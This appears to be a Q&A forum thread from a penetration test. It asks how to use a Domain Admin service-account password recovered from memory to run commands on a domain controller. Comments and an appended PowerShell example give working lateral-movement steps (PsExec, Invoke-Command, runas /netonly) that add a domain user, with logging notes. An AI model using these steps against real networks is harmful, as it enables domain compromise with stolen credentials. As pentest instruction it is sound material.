
I've compromised a Windows machine that leaks the password of a privileged service account ("Domain Admin") in memory (legal penetration test).

Since the account is a service account, it cannot be used to log into the machine interactively using, e.g., Remote Desktop.

Given that I have the username/password of the privileged service account, and that I have local administrator privileges on the machine, how can I run commands as the service account against the domain controller to add a new user, etc.?

user3382203
Shuzheng
  • If it is a Domain Admin, you can use PsExec. – Tryna Learn Somethin Oct 10 '18 at 11:57
  • @TrynaLearnSomethin - Thank you for the comment. Does it matter where PsExec is executed from, i.e. does it need to be executed from the machine on which the service account runs? I mean, does it work? Right now, the service account can't log on using the Windows logon screen, so can it log on to the domain controller? – Shuzheng Oct 10 '18 at 12:12
  • Just be on the same network and give PsExec the IP of the host you want to connect to, the username, the password or hash, and what to execute. If it is a Domain Admin, it will work like a charm. – Tryna Learn Somethin Oct 10 '18 at 12:19
  • @TrynaLearnSomethin - Any idea why I can't log on using this (Domain Admin) service account through Remote Desktop? – Shuzheng Oct 10 '18 at 12:38
  • It has to be added to the Remote Desktop Users group in order to RDP. – Tryna Learn Somethin Oct 10 '18 at 12:39
  • @TrynaLearnSomethin - But RDP actually works; I'm presented with the Windows logon screen. Then, when entering the credentials, it says that this account is not allowed to log on. Any ideas? – Shuzheng Oct 10 '18 at 12:49
  • Maybe RDP is allowed, but the user has to be added to the Remote Desktop Users group on that machine in order to RDP. – Tryna Learn Somethin Oct 10 '18 at 12:50
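
The procedure the comments sketch (run something on the DC with the recovered service-account credentials), as an added PowerShell example typed on the compromised host; this is not code from the question or the comments. The domain name CORP, account svc_backup, DC hostname DC01 and test user pentest_probe are hypothetical placeholders, PsExec.exe (Sysinternals) is assumed to be on the PATH, and the ActiveDirectory module is assumed to exist on the DC. The first function is the check a tester would want before trying RDP again: a "this account is not allowed to log on" message at the logon screen is usually a user-rights assignment (one of the SeDeny*LogonRight entries, or a missing SeRemoteInteractiveLogonRight) rather than a wrong password, so the function exports the local rights assignment with secedit and lists every right that names the account's SID. Two caveats on the comments: Sysinternals PsExec takes a password, not an NT hash (pass-the-hash needs other tooling such as Impacket's psexec.py or Mimikatz), and PsExec with -u/-p has the target perform an interactive logon (type 2) for that account, so it is subject to the same logon-right restrictions as the console; PowerShell remoting and runas /netonly only ever produce network logons on the DC.

```powershell
# Added example for this thread, not code from the original post or its comments.
# Hypothetical values: domain CORP, service account svc_backup, DC DC01, test user pentest_probe.
# Assumes a legal, in-scope engagement, local admin on this host, PsExec.exe on the PATH
# and the ActiveDirectory module on the DC.

$Domain   = 'CORP'
$SvcUser  = 'svc_backup'
$DC       = 'DC01'
$TestUser = 'pentest_probe'
$Cred     = Get-Credential -UserName "$Domain\$SvcUser" -Message 'Recovered service-account password'

# --- Check: which user rights on THIS host name the account? ------------------------------
# Explains a "not allowed to log on" at the RDP/console logon screen. secedit needs admin.
# Rights granted or denied via a group list the group's SID, not the account's, so an empty
# result does not prove the account is unrestricted.
function Get-LogonRightsForUser {
    param([string]$User)
    $sid = (New-Object System.Security.Principal.NTAccount($User)).Translate(
               [System.Security.Principal.SecurityIdentifier]).Value
    $cfg = Join-Path $env:TEMP 'user_rights.inf'
    secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    # Exported lines look like: SeDenyRemoteInteractiveLogonRight = *S-1-5-21-...-1105,*S-1-5-32-546
    $pat = '\*' + [regex]::Escape($sid) + '(,|\s*$)'
    Get-Content $cfg |
        Where-Object { $_ -match '^Se\w+\s*=' -and $_ -match $pat } |
        ForEach-Object { ($_ -split '=')[0].Trim() }
    Remove-Item $cfg -ErrorAction SilentlyContinue
}
Get-LogonRightsForUser -User "$Domain\$SvcUser"

# --- Option A: PsExec with explicit credentials ---------------------------------------------
# The DC logs the account on interactively (logon type 2) before running the command, so a
# deny-interactive-logon right on the DC breaks this. Takes a password only, not a hash.
$plain = $Cred.GetNetworkCredential().Password
psexec.exe "\\$DC" -accepteula -u $Cred.UserName -p $plain `
    cmd /c "net user $TestUser Tmp-Example-Pass-1 /add /domain"

# --- Option B: PowerShell remoting with explicit credentials --------------------------------
# Network logon (type 3) over WinRM with Kerberos/Negotiate; interactive-logon restrictions
# do not apply. WinRM must be enabled and reachable on the DC (TCP 5985/5986).
Invoke-Command -ComputerName $DC -Credential $Cred -ScriptBlock {
    param($Name)
    New-ADUser -Name $Name -SamAccountName $Name -Enabled $true `
        -AccountPassword (ConvertTo-SecureString 'Tmp-Example-Pass-1' -AsPlainText -Force)
    Get-ADUser -Identity $Name | Select-Object SamAccountName, Enabled, DistinguishedName
} -ArgumentList $TestUser

# --- Option C: runas /netonly ---------------------------------------------------------------
# Starts a LOCAL shell as the current user whose outbound network identity is the service
# account (logon type 9 here, type 3 on the DC). No interactive logon as the account happens
# anywhere, so logon-right denials on either machine are irrelevant. runas prompts for the
# password. In the new window run, for example:
#   Invoke-Command -ComputerName DC01 { Get-ADUser -Filter 'Name -like "pentest*"' }
runas /netonly /user:"$Domain\$SvcUser" 'powershell.exe -NoExit'

# Cleanup at the end of the test (run from any of the sessions above that reach the DC):
#   Remove-ADUser -Identity $TestUser -Server $DC -Confirm:$false
```

Whichever option is used, every one of them lands in the DC's Security log (4624 with the logon type noted above, plus 4720 for the user creation and, for PsExec, 7045 for the PSEXESVC service install), which is worth recording in the engagement notes for the blue team's benefit.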

0 Answers